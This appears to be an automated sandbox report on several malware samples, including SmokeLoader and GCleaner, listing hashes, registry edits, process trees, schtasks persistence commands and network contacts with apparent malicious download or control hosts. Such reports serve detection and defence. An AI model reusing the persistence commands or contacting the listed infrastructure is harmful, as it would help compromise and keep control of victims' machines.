| SHA1 | 33be1c115618cb692bb608926395c410583598d4 |
| SHA256 | f85c7642fa51870023f460aa20ab38808c0e70ac40dcbbd21d99c95901aaf332 |
| SHA512 | f617b051aefd8f739b541e5fcef0efcd800dffa36c8ef433e0a087ad5582c219308e34d89af78685713d4926fa6d481a5164447125ba45b98ec789fb268bd60c |
C:\Program Files (x86)\LsajhStaXkJRC\gFQELly.xml
| MD5 | 18f67a6651dba9340b3c11640c7b5393 |
| SHA1 | 0a0b263a44965dd1b818c3fcb755c7244f7624b2 |
| SHA256 | 53e20d877570042297c57b94fa6ee4b91c62b308f287ce4991fb5b0e88a22beb |
| SHA512 | 89b59f4a1c1a321b04daf4e0e298b0709c806851ddf2e72f0288f255752b8b865b79b4da972bdc1d823a281a2458f8abab74a4b2863c2bf7353eb5df16de5b29 |
C:\Windows\Temp\biwNYXhGTKCQxjLv\oGyfpWoM\kkFeUXu.dll
| MD5 | 617698f01c7cceb3b262a98ba4da5a98 |
| SHA1 | c9244abc65ab3c485cc197ddea5e846b65d14bad |
| SHA256 | 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754 |
| SHA512 | 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400 |
memory/1484-323-0x0000000005170000-0x000000000522D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs.js
| MD5 | 721a57aa8c35edcc2950d68914949582 |
| SHA1 | 15fda8154c8ab245ce9f667ccfba6dea33754cfc |
| SHA256 | 84bb1362646738e7267136a0954560f7a52ba7160d13baeb703a242650d01c83 |
| SHA512 | 7fdcf200c13f0736ae8f66e10fb2b58ea5a7ebf38b0df800ea5025766f96578416a93b88fa44fe3b4d24fb9852291d2ca8455faca4dd7cf8f01e351cca0aaaca |
memory/1484-313-0x00000000050F0000-0x0000000005163000-memory.dmp
memory/4208-347-0x00000000757C0000-0x00000000757D0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
136s
Command Line
Signatures
SmokeLoader
Smokeloader family
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\PL\6523.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\6523.exe
"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4872 -ip 4872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 460
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
Files
memory/4872-3-0x0000000000400000-0x0000000000448000-memory.dmp
memory/4872-2-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4872-1-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/4872-6-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4872-5-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5076 wrote to memory of 2632 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE |
| PID 5076 wrote to memory of 2632 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE |
| PID 5076 wrote to memory of 2632 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe
"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
| US | 8.8.8.8:53 | www.filifilm.com.br | udp |
Files
memory/2632-5-0x0000000074E9E000-0x0000000074E9F000-memory.dmp
memory/2632-6-0x0000000000F90000-0x0000000000F98000-memory.dmp
memory/2632-7-0x0000000074E9E000-0x0000000074E9F000-memory.dmp
memory/2632-8-0x0000000074E90000-0x0000000075640000-memory.dmp
memory/2632-9-0x0000000074E90000-0x0000000075640000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
137s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3620 wrote to memory of 4032 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 3620 wrote to memory of 4032 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 3620 wrote to memory of 4032 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 3620 wrote to memory of 4516 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 3620 wrote to memory of 4516 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 3620 wrote to memory of 4516 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\Service.exe
"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| FI | 163.123.143.4:80 | 163.123.143.4 | tcp |
| NL | 107.182.129.251:80 | 107.182.129.251 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.143.123.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.129.182.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | softs-portal.com | udp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| US | 8.8.8.8:53 | 12.143.123.163.in-addr.arpa | udp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| US | 8.8.8.8:53 | vipsofts.xyz | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
GCleaner
Gcleaner family
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\setup.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PL\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1920 -ip 1920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 892
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 208.67.104.97:80 | tcp | |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 208.67.104.97:80 | tcp | |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 208.67.104.97:80 | tcp | |
| US | 8.8.8.8:53 | 103.208.201.84.in-addr.arpa | udp |
| US | 208.67.104.97:80 | tcp | |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp | |
| US | 208.67.104.97:80 | tcp |
Files
memory/1920-1-0x00000000004B0000-0x00000000005B0000-memory.dmp
memory/1920-2-0x0000000000460000-0x000000000049F000-memory.dmp
memory/1920-3-0x0000000000400000-0x0000000000443000-memory.dmp
memory/1920-4-0x00000000004B0000-0x00000000005B0000-memory.dmp
memory/1920-5-0x0000000000400000-0x000000000045E000-memory.dmp
memory/1920-6-0x0000000000460000-0x000000000049F000-memory.dmp
memory/1920-7-0x0000000000400000-0x0000000000443000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win7-20240729-en
Max time kernel
15s
Max time network
16s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1820 wrote to memory of 1160 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1820 wrote to memory of 1160 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1820 wrote to memory of 1160 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1820 wrote to memory of 1160 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1820 wrote to memory of 2436 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1820 wrote to memory of 2436 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1820 wrote to memory of 2436 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 1820 wrote to memory of 2436 | N/A | C:\Users\Admin\AppData\Local\Temp\PL\Service.exe | C:\Windows\SysWOW64\schtasks.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PL\Service.exe
"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | dzen.ru | udp |
| RU | 62.217.160.2:443 | dzen.ru | tcp |
| US | 8.8.8.8:53 | sso.passport.yandex.ru | udp |
| RU | 93.158.134.144:443 | sso.passport.yandex.ru | tcp |
| FI | 163.123.143.4:80 | 163.123.143.4 | tcp |
| NL | 107.182.129.251:80 | 107.182.129.251 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | softs-portal.com | udp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| FI | 163.123.143.12:80 | 163.123.143.12 | tcp |
| US | 8.8.8.8:53 | vipsofts.xyz | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-11 08:10
Reported
2024-11-11 08:13
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3680 set thread context of 4036 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe
"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"
